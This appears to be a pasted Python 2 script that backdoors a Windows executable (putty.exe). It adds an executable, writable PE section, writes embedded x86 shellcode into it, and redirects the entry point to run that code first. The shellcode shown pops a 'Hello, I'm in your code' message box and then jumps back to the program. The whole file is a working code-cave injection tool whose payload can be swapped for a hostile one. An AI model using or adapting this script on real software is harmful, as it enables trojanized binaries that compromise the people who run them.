import pefileimport mmapimport osdef align(val_to_align, alignment):

1. import pefile
2. import mmap
3. import os
4.  
5.  
6. def align(val_to_align, alignment):
7. return ((val_to_align + alignment - 1) / alignment) * alignment
8.  
9. exe_path = "C:\Users\jbt\Desktop\putty.exe"
10. shellcode = bytes(b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"
11. b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"
12. b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"
13. b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"
14. b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"
15. b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"
16. b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"
17. b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
18. b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"
19. b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
20. b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e"
21. b"\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"
22. b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"
23. b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"
24. b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
25. b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x69\x74\x79\x58\x68"
26. b"\x65\x63\x75\x72\x68\x6b\x49\x6e\x53\x68\x42\x72\x65"
27. b"\x61\x31\xdb\x88\x5c\x24\x0f\x89\xe3\x68\x65\x58\x20"
28. b"\x20\x68\x20\x63\x6f\x64\x68\x6e\x20\x75\x72\x68\x27"
29. b"\x6d\x20\x69\x68\x6f\x2c\x20\x49\x68\x48\x65\x6c\x6c"
30. b"\x31\xc9\x88\x4c\x24\x15\x89\xe1\x31\xd2\x6a\x40\x53"
31. b"\x51\x52\xff\xd0\xB8\xF0\x50\x45\x00\xFF\xD0")
32.  
33. # STEP 0x01 - Resize the Executable
34. # Note: I added some more space to avoid error
35. print "[*] STEP 0x01 - Resize the Executable"
36.  
37. original_size = os.path.getsize(exe_path)
38. print "\t[+] Original Size = %d" % original_size
39. fd = open(exe_path, 'a+b')
40. map = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_WRITE)
41. map.resize(original_size + 0x2000)
42. map.close()
43. fd.close()
44.  
45. print "\t[+] New Size = %d bytes\n" % os.path.getsize(exe_path)
46.  
47. # STEP 0x02 - Add the New Section Header
48. print "[*] STEP 0x02 - Add the New Section Header"
49.  
50. pe = pefile.PE(exe_path)
51. number_of_section = pe.FILE_HEADER.NumberOfSections
52. last_section = number_of_section - 1
53. file_alignment = pe.OPTIONAL_HEADER.FileAlignment
54. section_alignment = pe.OPTIONAL_HEADER.SectionAlignment
55. new_section_offset = (pe.sections[number_of_section - 1].get_file_offset() + 40)
56.  
57. # Look for valid values for the new section header
58. raw_size = align(0x1000, file_alignment)
59. virtual_size = align(0x1000, section_alignment)
60. raw_offset = align((pe.sections[last_section].PointerToRawData +
61. pe.sections[last_section].SizeOfRawData),
62. file_alignment)
63.  
64. virtual_offset = align((pe.sections[last_section].VirtualAddress +
65. pe.sections[last_section].Misc_VirtualSize),
66. section_alignment)
67.  
68. # CODE | EXECUTE | READ | WRITE
69. characteristics = 0xE0000020
70. # Section name must be equal to 8 bytes
71. name = ".axc" + (4 * '\x00')
72.  
73. # Create the section
74. # Set the name
75. pe.set_bytes_at_offset(new_section_offset, name)
76. print "\t[+] Section Name = %s" % name
77. # Set the virtual size
78. pe.set_dword_at_offset(new_section_offset + 8, virtual_size)
79. print "\t[+] Virtual Size = %s" % hex(virtual_size)
80. # Set the virtual offset
81. pe.set_dword_at_offset(new_section_offset + 12, virtual_offset)
82. print "\t[+] Virtual Offset = %s" % hex(virtual_offset)
83. # Set the raw size
84. pe.set_dword_at_offset(new_section_offset + 16, raw_size)
85. print "\t[+] Raw Size = %s" % hex(raw_size)
86. # Set the raw offset
87. pe.set_dword_at_offset(new_section_offset + 20, raw_offset)
88. print "\t[+] Raw Offset = %s" % hex(raw_offset)
89. # Set the following fields to zero
90. pe.set_bytes_at_offset(new_section_offset + 24, (12 * '\x00'))
91. # Set the characteristics
92. pe.set_dword_at_offset(new_section_offset + 36, characteristics)
93. print "\t[+] Characteristics = %s\n" % hex(characteristics)
94.  
95. # STEP 0x03 - Modify the Main Headers
96. print "[*] STEP 0x03 - Modify the Main Headers"
97. pe.FILE_HEADER.NumberOfSections += 1
98. print "\t[+] Number of Sections = %s" % pe.FILE_HEADER.NumberOfSections
99. pe.OPTIONAL_HEADER.SizeOfImage = virtual_size + virtual_offset
100. print "\t[+] Size of Image = %d bytes" % pe.OPTIONAL_HEADER.SizeOfImage
101.  
102. pe.write(exe_path)
103.  
104. pe = pefile.PE(exe_path)
105. number_of_section = pe.FILE_HEADER.NumberOfSections
106. last_section = number_of_section - 1
107. new_ep = pe.sections[last_section].VirtualAddress
108. print "\t[+] New Entry Point = %s" % hex(pe.sections[last_section].VirtualAddress)
109. oep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
110. print "\t[+] Original Entry Point = %s\n" % hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
111. pe.OPTIONAL_HEADER.AddressOfEntryPoint = new_ep
112.  
113. # STEP 0x04 - Inject the Shellcode in the New Section
114. print "[*] STEP 0x04 - Inject the Shellcode in the New Section"
115.  
116. raw_offset = pe.sections[last_section].PointerToRawData
117. pe.set_bytes_at_offset(raw_offset, shellcode)
118. print "\t[+] Shellcode wrote in the new section"
119.  
120. pe.write(exe_path)